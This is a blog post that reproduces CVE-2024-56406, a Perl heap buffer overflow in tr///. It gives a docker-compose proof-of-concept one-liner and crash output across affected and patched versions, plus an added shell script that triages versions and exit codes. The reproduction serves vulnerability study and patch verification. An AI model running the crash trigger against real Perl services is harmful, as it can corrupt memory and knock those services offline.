CVE-2024-56406

Saturday, May 17, 2025 | Tags: perl

In the earlier post, I discussed CVEs in general and re-created CVE-2018-18311, CVE-2023-31486 and CVE-2023-47038.

Recently I found out about the CPAN Security Group, which is the CVE Numbering Authority (CNA) for CPAN and Perl.

At the Perl Toolchain Summit 2025, I had the honour of meeting some of the members of the group, i.e. Stig Palmquist and Breno Oliveira.

Continuing with the series, today I am talking about one more: CVE-2024-56406.

This particular one affected v5.34, v5.36, v5.38 and v5.40.

It’s a heap buffer overflow when transliterating non-ASCII bytes.

According to the official document, the specific affected versions are listed below:


    from 5.40.0 until 5.40.2
    from 5.38.0 until 5.38.4
    from 5.36.0 through 5.36.3
    from 5.34.0 through 5.34.3

I will follow the same pattern as before and create Docker containers with the affected Perl versions.

I’ll also add a couple of good ones.

This is my docker configuration file: docker-compose.yml


version: '3.8'

x-shared-config: &shared
    command: &perl_command
      - perl
      - -e
      - |
        $$_ = "\x{FF}" x 1000000;
        tr/\xFF/\x{100}/;
        print "If you see this, Perl didn't crash!!\n";
    deploy: &resource_limits
      resources:
        limits:
          memory: 2G

services:
  perl_5_34_0:
    <<: *shared
    container_name: perl_5_34_0
    image: perl:5.34.0

  perl_5_36_0:
    <<: *shared
    container_name: perl_5_36_0
    image: perl:5.36.0

  perl_5_38_0:
    <<: *shared
    container_name: perl_5_38_0
    image: perl:5.38.0

  perl_5_38_4:
    <<: *shared
    container_name: perl_5_38_4
    image: perl:5.38.4

  perl_5_40_0:
    <<: *shared
    container_name: perl_5_40_0
    image: perl:5.40.0

  perl_5_40_2:
    <<: *shared
    container_name: perl_5_40_2
    image: perl:5.40.2

In summary, I am creating the following services, which should throw an error as expected:


    perl_5_34_0
    perl_5_36_0
    perl_5_38_0
    perl_5_40_0

There are two more services, perl_5_38_4 and perl_5_40_2, which should be safe and unaffected.

Finally, it’s time to re-create the issue.


$ docker-compose run --rm perl_5_34_0
Creating cve-2024-56406_perl_5_34_0_run ... done
ERROR: 139

$ docker-compose run --rm perl_5_36_0
Creating cve-2024-56406_perl_5_36_0_run ... done
ERROR: 139

$ docker-compose run --rm perl_5_38_0
Creating cve-2024-56406_perl_5_38_0_run ... done
ERROR: 139

$ docker-compose run --rm perl_5_40_0
Creating cve-2024-56406_perl_5_40_0_run ... done
ERROR: 139

As you may have noticed, the exit code is 139 for the affected services.

As we know, exit code = signal number + 128, and the segfault signal (SIGSEGV) is number 11, so 11 + 128 = 139.

And the good ones are:


$ docker-compose run --rm perl_5_38_4
Creating cve-2024-56406_perl_5_38_4_run ... done
If you see this, Perl didn't crash!!

$ docker-compose run --rm perl_5_40_2
Creating cve-2024-56406_perl_5_40_2_run ... done
If you see this, Perl didn't crash!!
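
The affected ranges and the exit-code arithmetic above can be folded into a small triage helper for checking other Perl installs. This is an added example, not code from the original post; the function names and verdict labels are made up for illustration, and exit status 0 is assumed for the two runs that printed the success message.

```shell
#!/bin/sh
# Added example, not from the original post.

# is_affected VERSION: 0 = inside an affected range, 1 = outside, 2 = unparseable.
# Ranges are the four quoted in the post: "until" excludes the upper bound
# (5.40.2 and 5.38.4 are fixed), "through" includes it (5.36.3, 5.34.3).
is_affected() {
    v=${1#v}                                    # accept v5.38.0 or 5.38.0
    case $v in ''|*[!0-9.]*) return 2 ;; esac   # digits and dots only
    old_ifs=$IFS; IFS=.
    set -- $v                                   # split into major minor patch
    IFS=$old_ifs
    [ -n "$1" ] && [ -n "$2" ] || return 2
    major=$1 minor=$2 patch=${3:-0}
    [ "$major" -eq 5 ] || return 1
    case $minor in
        40)    [ "$patch" -lt 2 ] ;;
        38)    [ "$patch" -lt 4 ] ;;
        36|34) [ "$patch" -le 3 ] ;;
        *)     return 1 ;;
    esac
}

# signal_of STATUS: print the signal number when STATUS follows the
# "128 + signal" convention from the post; print nothing otherwise.
signal_of() {
    [ "$1" -gt 128 ] && echo $(( $1 - 128 ))
    return 0
}

# triage VERSION STATUS: one-word verdict (labels are this example's own).
triage() {
    rc=0; is_affected "$1" || rc=$?
    sig=$(signal_of "$2")
    case $rc in
        2) echo unknown-version ;;
        0) if [ "$sig" = 11 ]; then echo vulnerable-segfault
           else echo vulnerable-no-crash; fi ;;
        *) if [ "$2" -eq 0 ]; then echo unaffected-ok
           else echo unexpected-failure; fi ;;
    esac
}

# Image versions and statuses from the post's runs (status 0 is assumed for
# the two runs that printed the success message).
for pair in 5.34.0:139 5.36.0:139 5.38.0:139 5.40.0:139 5.38.4:0 5.40.2:0; do
    ver=${pair%:*}; status=${pair#*:}
    printf '%-7s %-4s %s\n' "$ver" "$status" "$(triage "$ver" "$status")"
done
```

A `vulnerable-no-crash` verdict does not mean the install is safe: the version is still inside an affected range and should be upgraded.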



Happy Hacking !!!
